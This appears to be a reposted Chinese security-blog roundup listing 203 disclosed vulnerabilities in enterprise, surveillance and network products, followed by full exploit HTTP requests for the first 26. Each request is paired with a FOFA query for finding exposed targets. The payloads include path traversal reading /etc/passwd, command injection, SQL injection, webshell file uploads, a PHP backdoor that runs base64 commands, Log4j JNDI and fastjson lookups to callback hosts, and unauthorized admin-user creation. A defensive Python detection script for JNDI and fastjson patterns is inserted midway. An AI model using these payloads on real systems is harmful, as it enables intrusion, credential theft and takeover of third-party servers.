Roundup of publicly disclosed internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, and we hope this article helps with defence. Defenders can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024, all taken from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are publicly disclosed; for patches or remediation guidance, contact the product vendor.

Content: because of space limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legitimate rights: if the content infringes any party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version as it stands; when using it, press F12 and search for a keyword.

Bookmark this article if you need it, and feel free to follow this public account (网络安全新视界).

Contents

- T A! `+ S! c6 N! J( b
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运主动安全监控云平台 arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS 数字监控系统 user_edit.action information disclosure
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL injection
20. 大华ICC智能物联综合管理平台 arbitrary file read
21. 大华ICC智能物联综合管理平台 random remote code execution
22. 大华ICC智能物联综合管理平台 log4j remote code execution
23. 大华ICC智能物联综合管理平台 fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud 政府财务云 arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空社会化商业ERP系统 validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart管理平台 importexport.php SQL injection
61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 privilege bypass
66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园服务管理平台 service.action remote command execution
77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
79. BYTEVALUE 百为流控路由器 remote command execution
80. 速达天耀软件 DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒明御安全网关 aaa_local_web_preview file upload
88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
89. 致远互联FE协作办公平台 editflow_manager SQL injection
90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
92. 海康威视运行管理中心 session command execution
93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600防火墙 obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视高清智能录播系统 busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能S210管理平台 uploadfile.php arbitrary file upload
119. 北京百绰智能S20后台 sysmanageajax.php SQL injection
120. 北京百绰智能S40管理平台 import web.php arbitrary file upload
121. 北京百绰智能S42管理平台 userattestation.php arbitrary file upload
122. 北京百绰智能s200管理平台 /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研工程质量检测系统 arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu客服系统 arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and below authentication bypass
133. H5云商城 file.php file upload
134. 网康NS-ASG应用安全网关 index.php SQL injection
135. 网康NS-ASG应用安全网关 list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅通信指挥调度平台 down_file.php SQL injection
138. 福建科立讯通信指挥调度平台 pwd_update.php SQL injection
139. 福建科立讯通信指挥调度平台 editemedia.php SQL injection
140. 福建科立讯通信指挥调度平台 get_extension_yl.php SQL injection
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL injection
142. CMSV6车辆监控平台系统 weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔消防救援作战调度平台 SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信票务管理平台 SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6车载定位监控平台 SQL injection
172. DT-高清车牌识别摄像机 arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. 电信网关配置管理系统 rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C校园网自助服务系统 flexfileupload arbitrary file upload
179. 建文工程管理系统 arbitrary file read
180. 帮管客CRM jiliyu SQL injection
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼应用虚拟化系统 SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会视频会议 attachment arbitrary file read
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
190. 短视频矩阵营销系统 poihuoqu arbitrary file read
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
196. 河南省风速科技统一认证平台 password reset
197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS海洋影视管理系统 dmku SQL injection
201. 方正全媒体新闻采编系统 binary SQL injection
202. 微擎系统 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 of your own password.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运主动安全监控云平台 arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default account admin, perform the following operation.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the planted function executes a command passed base64-encoded.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS 数字监控系统 user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC智能物联综合管理平台 arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC智能物联综合管理平台 random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华ICC智能物联综合管理平台 log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC智能物联综合管理平台 fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

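Defender-side check for entries 22, 23 and 25, written for this page (it is not code from the original post or from Dahua or Yonyou). Those three requests carry the three shapes a WAF or log scanner should recognise: a Log4j-style ${jndi:...} lookup in a JSON field, a fastjson "@type" key, and a bare JNDI provider URL passed as an ordinary parameter (dsname=ldap://...). The scanner also folds the nested-lookup obfuscations seen in the wild (${lower:j}, ${::-j}) before matching, which the page's plain payload does not need but a real attacker will use. The sample bodies are constructed from the entries; host names are placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Nested lookups such as ${lower:j} or ${::-j} are folded to their final value so
# that ${${lower:j}ndi:...} becomes ${jndi:...}. The lookahead leaves jndi itself alone.
_NESTED = re.compile(r"\$\{(?!\s*jndi\s*:)[^{}]*:-?([^{}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^{}]*\}", re.I)
# A JNDI provider URL handed over as a plain parameter value (entry 25: dsname=ldap://...).
_JNDI_URL = re.compile(r"^\s*(?:ldaps?|rmi|iiop|corba|nds)://", re.I)
# fastjson autotype key. Entry 23 uses java.net.URL only to trigger a DNS lookup;
# the same key with a gadget class is what turns it into code execution.
_FASTJSON_TYPE = re.compile(r'"@type"\s*:\s*"([A-Za-z_$][\w$.]*)"')

# Constructed samples in the shape of entries 22, 23 and 25 (hosts are placeholders).
SAMPLE_22 = '{"loginName":"${jndi:ldap://dnslog}"}'
SAMPLE_23 = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
             '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}')
SAMPLE_25 = "type=1&dsname=ldap://dnslog"
SAMPLE_OBFUSCATED = '{"u":"${${lower:j}ndi:${::-l}dap://x.example}"}'


def fold_lookups(s: str) -> str:
    """Resolve nested ${name:default} lookups until the string stops changing."""
    prev = None
    while prev != s:
        prev, s = s, _NESTED.sub(r"\1", s)
    return s


def scan_body(body: str) -> list[tuple[str, str]]:
    """Return (kind, evidence) pairs for JNDI and fastjson indicators in a request body.

    The raw text and its URL-decoded form are both scanned, so JSON bodies and
    application/x-www-form-urlencoded bodies are covered without knowing the type.
    """
    findings: list[tuple[str, str]] = []
    for text in (body, unquote_plus(body)):
        folded = fold_lookups(text)
        findings += [("jndi-lookup", m.group(0)) for m in _JNDI.finditer(folded)]
        findings += [("fastjson-type", cls) for cls in _FASTJSON_TYPE.findall(text)]
        for key, value in parse_qsl(text, keep_blank_values=True):
            if _JNDI_URL.match(value):
                findings.append(("jndi-url", f"{key}={value}"))
    return list(dict.fromkeys(findings))   # de-duplicate, keep first-seen order


if __name__ == "__main__":
    for sample in (SAMPLE_22, SAMPLE_23, SAMPLE_25, SAMPLE_OBFUSCATED):
        print(scan_body(sample))
```

Run it over request bodies from the access log or a WAF mirror; any "jndi-lookup" or "jndi-url" hit against a Log4j 2.x / JNDI-enabled Java service is worth an immediate egress check for LDAP (389/636) and RMI (1099) connections from that host. A "fastjson-type" hit on an endpoint that never legitimately carries polymorphic JSON is the entry-23 probe regardless of which class is named.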
26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
